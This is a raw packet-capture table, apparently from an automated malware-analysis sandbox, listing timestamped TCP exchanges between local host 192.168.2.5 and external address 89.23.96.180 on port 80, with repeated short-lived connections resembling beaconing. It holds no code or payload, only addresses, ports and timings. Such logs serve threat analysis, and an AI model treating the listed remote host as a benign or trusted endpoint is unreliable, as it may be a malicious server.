Dec 21, 2024 10:03:34.787770033 CET	80	49919	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:34.787926912 CET	49919	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:34.788189888 CET	80	49920	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:34.788235903 CET	49926	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:34.788264036 CET	49920	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:34.796835899 CET	49926	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:34.916398048 CET	80	49926	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:35.156455040 CET	49926	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:35.276299000 CET	80	49926	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:35.276330948 CET	80	49926	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:35.276365995 CET	80	49926	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:36.163799047 CET	80	49926	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:36.218529940 CET	49926	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:36.396311045 CET	80	49926	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:36.437199116 CET	49926	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:36.514370918 CET	49906	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:36.518342018 CET	49926	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:36.518682957 CET	49932	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:36.638288975 CET	80	49932	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:36.638478994 CET	49932	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:36.638515949 CET	80	49926	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:36.638793945 CET	49932	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:36.638823032 CET	49926	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:36.758544922 CET	80	49932	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:36.987864017 CET	49932	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:37.129415989 CET	80	49932	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:37.129509926 CET	80	49932	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:37.129539967 CET	80	49932	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:38.014162064 CET	80	49932	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:38.062244892 CET	49932	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:38.248359919 CET	80	49932	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:38.296607971 CET	49932	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:38.376172066 CET	49932	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:38.376533031 CET	49938	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:38.496129990 CET	80	49938	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:38.496160030 CET	80	49932	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:38.496371984 CET	49932	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:38.496414900 CET	49938	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:38.496766090 CET	49938	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:38.616421938 CET	80	49938	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:38.843765974 CET	49938	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:38.964241028 CET	80	49938	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:38.964380980 CET	80	49938	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:38.964401960 CET	80	49938	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:39.422619104 CET	49938	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:39.422679901 CET	49939	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:39.542217970 CET	49940	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:39.542326927 CET	80	49939	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:39.542536974 CET	49939	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:39.542537928 CET	49939	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:39.542671919 CET	80	49938	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:39.542735100 CET	49938	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:39.662101030 CET	80	49940	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:39.662189007 CET	49940	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:39.662256002 CET	80	49939	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:39.662297010 CET	49940	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:39.781729937 CET	80	49940	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:39.890510082 CET	49939	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:40.015459061 CET	49940	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:40.043288946 CET	80	49939	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:40.044361115 CET	80	49939	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:40.135234118 CET	80	49940	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:40.135446072 CET	80	49940	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:40.135474920 CET	80	49940	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:40.919259071 CET	80	49939	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:40.968522072 CET	49939	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:41.040293932 CET	80	49940	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:41.093477011 CET	49940	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:41.156363964 CET	80	49939	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:41.202862978 CET	49939	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:41.272377968 CET	80	49940	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:41.312331915 CET	49940	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:41.388020039 CET	49939	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:41.388358116 CET	49940	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:41.388454914 CET	49946	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:41.507910013 CET	80	49946	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:41.507925987 CET	80	49939	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:41.508018017 CET	49939	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:41.508035898 CET	49946	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:41.508147001 CET	49946	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:41.508575916 CET	80	49940	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:41.508651018 CET	49940	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:41.628747940 CET	80	49946	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:41.859224081 CET	49946	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:41.982741117 CET	80	49946	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:41.982757092 CET	80	49946	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:41.982834101 CET	80	49946	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:42.885377884 CET	80	49946	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:42.937191963 CET	49946	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:43.120584011 CET	80	49946	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:43.171596050 CET	49946	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:43.247113943 CET	49952	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:43.366795063 CET	80	49952	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:43.366899967 CET	49952	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:43.367108107 CET	49952	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:43.486829996 CET	80	49952	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:43.718601942 CET	49952	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:43.838484049 CET	80	49952	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:43.838500977 CET	80	49952	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:43.838514090 CET	80	49952	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:44.746711969 CET	80	49952	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:44.796595097 CET	49952	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:44.980382919 CET	80	49952	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:45.031049967 CET	49952	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:45.109323025 CET	49952	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:45.109596968 CET	49958	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:45.229521990 CET	80	49958	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:45.229556084 CET	80	49952	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:45.229618073 CET	49958	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:45.229650974 CET	49952	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:45.229773998 CET	49958	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:45.349347115 CET	80	49958	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:45.578068972 CET	49958	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:45.699172020 CET	80	49958	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:45.699208021 CET	80	49958	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:45.699237108 CET	80	49958	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:46.172609091 CET	49959	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:46.172908068 CET	49958	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:46.292951107 CET	80	49959	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:46.293044090 CET	49959	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:46.293195009 CET	49959	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:46.293251038 CET	80	49958	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:46.293349981 CET	49958	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:46.308212996 CET	49960	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:46.412760019 CET	80	49959	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:46.427766085 CET	80	49960	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:46.427849054 CET	49960	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:46.428020954 CET	49960	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:46.547512054 CET	80	49960	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:46.640572071 CET	49959	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:46.761822939 CET	80	49959	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:46.761858940 CET	80	49959	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:46.781085968 CET	49960	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:46.900799990 CET	80	49960	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:46.900859118 CET	80	49960	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:46.900887966 CET	80	49960	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:47.672502995 CET	80	49959	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:47.718462944 CET	49959	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:47.806485891 CET	80	49960	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:47.859234095 CET	49960	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:47.908140898 CET	80	49959	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:47.952944994 CET	49959	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:48.044274092 CET	80	49960	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:48.084422112 CET	49960	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:48.170670986 CET	49946	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:48.174407005 CET	49959	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:48.174499035 CET	49960	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:48.174832106 CET	49966	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:48.294301987 CET	80	49959	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:48.294399023 CET	49959	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:48.294405937 CET	80	49966	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:48.294491053 CET	49966	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:48.294667006 CET	80	49960	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:48.294677019 CET	49966	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:48.294728994 CET	49960	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:48.414232969 CET	80	49966	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:48.640434980 CET	49966	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:48.761162996 CET	80	49966	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:48.761200905 CET	80	49966	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:48.761230946 CET	80	49966	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:49.673124075 CET	80	49966	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:49.718456030 CET	49966	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:49.908051968 CET	80	49966	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:49.952831984 CET	49966	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:50.026238918 CET	49966	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:50.026464939 CET	49972	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:50.146174908 CET	80	49972	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:50.146392107 CET	80	49966	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:50.146497011 CET	49966	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:50.146508932 CET	49972	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:50.147106886 CET	49972	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:50.266633034 CET	80	49972	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:50.499782085 CET	49972	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:50.619699955 CET	80	49972	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:50.619762897 CET	80	49972	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:50.619793892 CET	80	49972	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:51.523997068 CET	80	49972	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:51.577893019 CET	49972	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:51.756331921 CET	80	49972	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:51.796607018 CET	49972	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:51.874397039 CET	49972	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:51.874644995 CET	49978	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:51.994245052 CET	80	49978	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:51.994366884 CET	49978	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:51.994523048 CET	80	49972	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:51.994601011 CET	49978	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:51.994973898 CET	49972	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:52.115552902 CET	80	49978	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:52.343694925 CET	49978	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:52.463407040 CET	80	49978	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:52.463496923 CET	80	49978	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:52.463514090 CET	80	49978	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:52.963239908 CET	49979	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:52.965719938 CET	49978	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:53.105254889 CET	80	49979	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:53.105292082 CET	80	49978	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:53.105371952 CET	49979	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:53.105405092 CET	49978	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:53.106097937 CET	49979	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:53.158695936 CET	49985	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:53.227463007 CET	80	49979	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:53.279916048 CET	80	49985	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:53.280024052 CET	49985	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:53.280339956 CET	49985	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:53.399889946 CET	80	49985	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:53.453059912 CET	49979	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:53.573533058 CET	80	49979	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:53.574273109 CET	80	49979	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:53.624950886 CET	49985	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:53.744798899 CET	80	49985	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:53.744833946 CET	80	49985	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:53.744887114 CET	80	49985	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:54.486151934 CET	80	49979	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:54.531013966 CET	49979	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:54.656378031 CET	80	49985	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:54.702852964 CET	49985	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:54.720328093 CET	80	49979	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:54.765347958 CET	49979	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:54.892455101 CET	80	49985	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:54.937225103 CET	49985	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:55.017296076 CET	49979	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:55.017349958 CET	49985	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:55.017685890 CET	49986	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:55.137356043 CET	80	49986	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:55.137466908 CET	80	49979	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:55.137516975 CET	49986	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:55.137540102 CET	49979	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:55.137728930 CET	49986	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:55.137904882 CET	80	49985	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:55.138219118 CET	49985	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:55.257647038 CET	80	49986	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:55.513958931 CET	49986	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:55.633785963 CET	80	49986	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:55.633934021 CET	80	49986	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:55.633964062 CET	80	49986	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:56.514733076 CET	80	49986	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:56.562228918 CET	49986	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:56.748373985 CET	80	49986	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:56.748763084 CET	49986	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:56.868896008 CET	80	49986	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:56.868973970 CET	49986	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:56.872056961 CET	49992	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:56.991796017 CET	80	49992	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:56.993843079 CET	49992	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:56.993843079 CET	49992	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:57.113483906 CET	80	49992	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:57.343554020 CET	49992	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:57.463258982 CET	80	49992	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:57.463294983 CET	80	49992	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:57.463347912 CET	80	49992	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:58.380250931 CET	80	49992	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:58.421607018 CET	49992	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:58.614343882 CET	80	49992	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:58.655972004 CET	49992	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:58.732322931 CET	49992	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:58.732604980 CET	49998	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:58.852556944 CET	80	49992	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:58.852689981 CET	49992	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:58.896442890 CET	80	49998	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:58.896558046 CET	49998	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:58.896707058 CET	49998	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:59.017508030 CET	80	49998	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:59.249995947 CET	49998	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:59.369884014 CET	80	49998	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:59.369920969 CET	80	49998	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:59.369951010 CET	80	49998	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:59.735109091 CET	50004	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:59.735116959 CET	49998	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:59.855640888 CET	80	50004	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:59.855803967 CET	50004	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:59.855909109 CET	50004	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:59.856785059 CET	50005	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:59.896085978 CET	80	49998	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:59.936491013 CET	80	49998	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:59.936737061 CET	49998	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:59.977583885 CET	80	50004	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:59.978146076 CET	80	50005	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:59.978234053 CET	50005	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:59.978409052 CET	50005	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:04:00.098136902 CET	80	50005	89.23.96.180	192.168.2.5
Dec 21, 2024 10:04:00.202969074 CET	50004	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:04:00.322736979 CET	80	50004	89.23.96.180	192.168.2.5
Dec 21, 2024 10:04:00.322770119 CET	80	50004	89.23.96.180	192.168.2.5
Dec 21, 2024 10:04:00.328082085 CET	50005	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:04:00.447954893 CET	80	50005	89.23.96.180	192.168.2.5
Dec 21, 2024 10:04:00.447973967 CET	80	50005	89.23.96.180	192.168.2.5
Dec 21, 2024 10:04:00.447988987 CET	80	50005	89.23.96.180	192.168.2.5
Dec 21, 2024 10:04:01.236602068 CET	80	50004	89.23.96.180	192.168.2.5
Dec 21, 2024 10:04:01.281296015 CET	50004	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:04:01.354269028 CET	80	50005	89.23.96.180	192.168.2.5
Dec 21, 2024 10:04:01.407234907 CET	50005	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:04:01.472637892 CET	80	50004	89.23.96.180	192.168.2.5
Dec 21, 2024 10:04:01.519259930 CET	50004	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:04:01.588186026 CET	80	50005	89.23.96.180	192.168.2.5
Dec 21, 2024 10:04:01.641391039 CET	50005	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:04:01.714021921 CET	50004	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:04:01.714209080 CET	50005	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:04:01.714386940 CET	50006	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:04:01.834331989 CET	80	50006	89.23.96.180	192.168.2.5
Dec 21, 2024 10:04:01.834367990 CET	80	50004	89.23.96.180	192.168.2.5
Dec 21, 2024 10:04:01.834435940 CET	50006	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:04:01.834501028 CET	50004	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:04:01.834629059 CET	50006	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:04:01.835253954 CET	80	50005	89.23.96.180	192.168.2.5
Dec 21, 2024 10:04:01.837030888 CET	50005	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:04:01.954265118 CET	80	50006	89.23.96.180	192.168.2.5
Dec 21, 2024 10:04:02.187351942 CET	50006	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:04:02.307358980 CET	80	50006	89.23.96.180	192.168.2.5
Dec 21, 2024 10:04:02.307403088 CET	80	50006	89.23.96.180	192.168.2.5
Dec 21, 2024 10:04:02.307432890 CET	80	50006	89.23.96.180	192.168.2.5
Dec 21, 2024 10:04:03.209317923 CET	80	50006	89.23.96.180	192.168.2.5
Dec 21, 2024 10:04:03.249711990 CET	50006	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:04:03.444094896 CET	80	50006	89.23.96.180	192.168.2.5
Dec 21, 2024 10:04:03.446222067 CET	50006	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:04:03.558784008 CET	50012	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:04:03.566623926 CET	80	50006	89.23.96.180	192.168.2.5
Dec 21, 2024 10:04:03.567265034 CET	50006	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:04:03.678683043 CET	80	50012	89.23.96.180	192.168.2.5
Dec 21, 2024 10:04:03.678792953 CET	50012	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:04:03.678956032 CET	50012	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:04:03.798604012 CET	80	50012	89.23.96.180	192.168.2.5
Dec 21, 2024 10:04:04.031035900 CET	50012	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:04:04.151093960 CET	80	50012	89.23.96.180	192.168.2.5
Dec 21, 2024 10:04:04.151150942 CET	80	50012	89.23.96.180	192.168.2.5
Dec 21, 2024 10:04:04.151179075 CET	80	50012	89.23.96.180	192.168.2.5
Dec 21, 2024 10:04:05.056436062 CET	80	50012	89.23.96.180	192.168.2.5
Dec 21, 2024 10:04:05.109098911 CET	50012	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:04:05.296211958 CET	80	50012	89.23.96.180	192.168.2.5
Dec 21, 2024 10:04:05.343473911 CET	50012	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:04:05.416270018 CET	50012	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:04:05.416481018 CET	50018	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:04:05.536180019 CET	80	50018	89.23.96.180	192.168.2.5
Dec 21, 2024 10:04:05.536264896 CET	80	50012	89.23.96.180	192.168.2.5
Dec 21, 2024 10:04:05.536359072 CET	50012	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:04:05.536386967 CET	50018	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:04:05.536557913 CET	50018	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:04:05.656106949 CET	80	50018	89.23.96.180	192.168.2.5
Dec 21, 2024 10:04:05.890415907 CET	50018	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:04:06.010178089 CET	80	50018	89.23.96.180	192.168.2.5
Dec 21, 2024 10:04:06.010242939 CET	80	50018	89.23.96.180	192.168.2.5
